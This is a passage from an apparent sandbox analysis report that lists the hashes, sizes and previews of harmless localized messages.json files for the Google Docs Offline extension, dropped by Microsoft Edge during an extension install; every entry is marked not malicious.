                                                                                                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):963
                                                                                                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):884
                                                                                                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):980
                                                                                                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):879
                                                                                                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
